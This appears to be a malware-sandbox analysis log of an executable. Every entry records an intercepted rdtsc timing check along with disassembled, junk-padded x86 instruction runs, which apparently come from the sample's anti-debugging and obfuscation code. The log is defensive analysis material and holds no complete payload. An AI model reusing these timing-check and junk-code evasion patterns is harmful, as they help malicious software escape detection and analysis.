              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B6AF second address: A9B6C1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5444755FA8h 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F5444755FA6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B80B second address: A9B80F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B80F second address: A9B821 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5444755FA8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F5444755FA6h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B821 second address: A9B825 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C2B6 second address: A9C300 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5444755FB0h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jnp 00007F5444755FC0h 0x00000014 push edx 0x00000015 jmp 00007F5444755FB8h 0x0000001a pop edx 0x0000001b mov eax, dword ptr [eax] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jns 00007F5444755FA6h 0x00000026 js 00007F5444755FA6h 0x0000002c popad 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C300 second address: A9C326 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F5444E6F503h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007F5444E6F4F6h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C326 second address: A9C3A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444755FAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop esi 0x0000000d popad 0x0000000e pop eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F5444755FA8h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 mov esi, 74A248C5h 0x0000002e add dword ptr [ebp+122D2D12h], eax 0x00000034 call 00007F5444755FA9h 0x00000039 jmp 00007F5444755FB9h 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F5444755FB8h 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C3A8 second address: A9C3AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C3AC second address: A9C3B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C3B2 second address: A9C3D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5444E6F4FEh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 je 00007F5444E6F4F6h 0x0000001a pop esi 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C3D6 second address: A9C3E0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5444755FACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C3E0 second address: A9C401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007F5444E6F500h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C401 second address: A9C406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C406 second address: A9C40B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C9B4 second address: A9C9B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C9B8 second address: A9C9CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444E6F4FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C9CB second address: A9C9D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C9D1 second address: A9C9D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9D1EA second address: A9D1EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9D5A4 second address: A9D5C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, dword ptr [ebp+122D3728h] 0x00000011 jo 00007F5444E6F4FCh 0x00000017 mov esi, dword ptr [ebp+122D2C65h] 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 push edi 0x00000021 push edi 0x00000022 pop edi 0x00000023 pop edi 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9D5C8 second address: A9D5CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9D5CE second address: A9D5D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9E33C second address: A9E394 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444755FB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov dword ptr [esp], eax 0x0000000d adc si, EFABh 0x00000012 push 00000000h 0x00000014 mov esi, 66D5C059h 0x00000019 call 00007F5444755FB4h 0x0000001e pushad 0x0000001f mov dl, 0Fh 0x00000021 xor bh, 0000007Fh 0x00000024 popad 0x00000025 pop edi 0x00000026 push 00000000h 0x00000028 jnc 00007F5444755FA6h 0x0000002e mov di, E3C1h 0x00000032 push eax 0x00000033 push esi 0x00000034 push eax 0x00000035 push edx 0x00000036 js 00007F5444755FA6h 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9F3D2 second address: A9F3D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9F3D6 second address: A9F3DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9FF14 second address: A9FF25 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5444E6F4F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9FF25 second address: A9FF2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA0A42 second address: AA0AC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444E6F4FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b jmp 00007F5444E6F509h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F5444E6F4F8h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007F5444E6F4F8h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 0000001Ah 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 jne 00007F5444E6F4FBh 0x0000004e push eax 0x0000004f push esi 0x00000050 jbe 00007F5444E6F4FCh 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA28C1 second address: AA28C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5629 second address: AA562E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5BCA second address: AA5C35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444755FAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D36F5h], eax 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F5444755FA8h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000014h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e movsx ebx, dx 0x00000031 mov ebx, dword ptr [ebp+122D369Fh] 0x00000037 push 00000000h 0x00000039 xchg eax, esi 0x0000003a push ebx 0x0000003b jmp 00007F5444755FB6h 0x00000040 pop ebx 0x00000041 push eax 0x00000042 pushad 0x00000043 jno 00007F5444755FACh 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5C35 second address: AA5C39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6D50 second address: AA6D54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6D54 second address: AA6D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6D5A second address: AA6D64 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5444755FACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA7DE9 second address: AA7DEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6F7B second address: AA6FF3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5444755FA8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D358Bh] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a pushad 0x0000001b mov edi, edx 0x0000001d jmp 00007F5444755FAEh 0x00000022 popad 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a pushad 0x0000002b add eax, dword ptr [ebp+122D2929h] 0x00000031 jnc 00007F5444755FACh 0x00000037 popad 0x00000038 mov eax, dword ptr [ebp+122D0E75h] 0x0000003e push 00000000h 0x00000040 push edx 0x00000041 call 00007F5444755FA8h 0x00000046 pop edx 0x00000047 mov dword ptr [esp+04h], edx 0x0000004b add dword ptr [esp+04h], 00000014h 0x00000053 inc edx 0x00000054 push edx 0x00000055 ret 0x00000056 pop edx 0x00000057 ret 0x00000058 mov ebx, esi 0x0000005a push FFFFFFFFh 0x0000005c push eax 0x0000005d jc 00007F5444755FB0h 0x00000063 push eax 0x00000064 push edx 0x00000065 push ecx 0x00000066 pop ecx 0x00000067 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9E58 second address: AA9EDF instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5444E6F500h 0x00000008 jmp 00007F5444E6F4FAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F5444E6F4F8h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a jmp 00007F5444E6F505h 0x0000002f jmp 00007F5444E6F4FDh 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 call 00007F5444E6F4F8h 0x0000003e pop ecx 0x0000003f mov dword ptr [esp+04h], ecx 0x00000043 add dword ptr [esp+04h], 00000019h 0x0000004b inc ecx 0x0000004c push ecx 0x0000004d ret 0x0000004e pop ecx 0x0000004f ret 0x00000050 cmc 0x00000051 push 00000000h 0x00000053 mov dword ptr [ebp+122D2CAEh], ebx 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9EDF second address: AA9EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAAE6E second address: AAAE72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAAE72 second address: AAAE80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AABF0E second address: AABF14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAAFF8 second address: AAB015 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444755FB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AABF14 second address: AABF1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAEBDC second address: AAEBF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5444755FB8h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AABF1A second address: AABF1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AACF5C second address: AACF66 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5444755FACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AADD4A second address: AADD4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AABF1E second address: AABF32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jg 00007F5444755FA6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAB0D5 second address: AAB0FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F5444E6F507h 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAEDD3 second address: AAEDD9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AADD4E second address: AADD54 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AABF32 second address: AABF37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AABF37 second address: AABF82 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5444E6F4F8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D28F5h] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a movsx edi, bx 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 mov ebx, dword ptr [ebp+122D29EDh] 0x0000002a mov eax, dword ptr [ebp+122D05B5h] 0x00000030 jnc 00007F5444E6F4F9h 0x00000036 push FFFFFFFFh 0x00000038 pushad 0x00000039 movzx eax, cx 0x0000003c mov edi, dword ptr [ebp+122D2AE9h] 0x00000042 popad 0x00000043 push eax 0x00000044 push edi 0x00000045 push ebx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2AEE second address: AB2AF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2AF2 second address: AB2AF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB1D33 second address: AB1D37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2AF8 second address: AB2B4C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jg 00007F5444E6F4F6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edi, dword ptr [ebp+122D20D7h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007F5444E6F4F8h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 mov di, CBC9h 0x00000035 push 00000000h 0x00000037 add dword ptr [ebp+122D1B7Ch], eax 0x0000003d push eax 0x0000003e pushad 0x0000003f jnp 00007F5444E6F4F8h 0x00000045 pushad 0x00000046 popad 0x00000047 push ecx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2D35 second address: AB2D39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4CB7 second address: AB4CCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jng 00007F5444E6F4F6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4CCB second address: AB4CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4CCF second address: AB4CD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3D2E second address: AB3D38 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5444755FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3D38 second address: AB3D3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3D3E second address: AB3D42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9F93 second address: AB9FA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jno 00007F5444E6F4F6h 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF6D9 second address: ABF704 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444755FADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5444755FB8h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF704 second address: ABF708 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF708 second address: ABF711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC4DD8 second address: AC4E0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5444E6F507h 0x00000008 jmp 00007F5444E6F4FBh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 je 00007F5444E6F502h 0x00000017 jo 00007F5444E6F4FCh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC4E0F second address: AC4E2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, dword ptr [esp+04h] 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5444755FB3h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC4E2C second address: AC4E6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5444E6F4FBh 0x00000008 jg 00007F5444E6F4F6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [eax] 0x00000013 jng 00007F5444E6F50Eh 0x00000019 push edx 0x0000001a jmp 00007F5444E6F506h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 pushad 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC4F54 second address: 8EF8EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444755FAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 54FB868Bh 0x00000010 jmp 00007F5444755FB8h 0x00000015 push dword ptr [ebp+122D13F5h] 0x0000001b ja 00007F5444755FA7h 0x00000021 call dword ptr [ebp+122D179Eh] 0x00000027 pushad 0x00000028 jmp 00007F5444755FB0h 0x0000002d xor eax, eax 0x0000002f stc 0x00000030 mov edx, dword ptr [esp+28h] 0x00000034 or dword ptr [ebp+122D17EAh], eax 0x0000003a mov dword ptr [ebp+122D293Dh], eax 0x00000040 mov dword ptr [ebp+122D36A5h], eax 0x00000046 mov esi, 0000003Ch 0x0000004b jc 00007F5444755FACh 0x00000051 mov dword ptr [ebp+122D36A5h], eax 0x00000057 add esi, dword ptr [esp+24h] 0x0000005b pushad 0x0000005c je 00007F5444755FACh 0x00000062 mov dword ptr [ebp+122D36A5h], ecx 0x00000068 mov dword ptr [ebp+122D17D1h], edi 0x0000006e popad 0x0000006f lodsw 0x00000071 jmp 00007F5444755FB1h 0x00000076 add eax, dword ptr [esp+24h] 0x0000007a jns 00007F5444755FA7h 0x00000080 mov ebx, dword ptr [esp+24h] 0x00000084 mov dword ptr [ebp+122D17EAh], ecx 0x0000008a cld 0x0000008b push eax 0x0000008c pushad 0x0000008d je 00007F5444755FA8h 0x00000093 pushad 0x00000094 popad 0x00000095 push eax 0x00000096 push edx 0x00000097 push ecx 0x00000098 pop ecx 0x00000099 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5DEEF second address: A5DEF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACA363 second address: ACA367 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACA367 second address: ACA36D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACA36D second address: ACA388 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444755FB5h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACA4FE second address: ACA521 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444E6F509h 0x00000007 jne 00007F5444E6F4F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
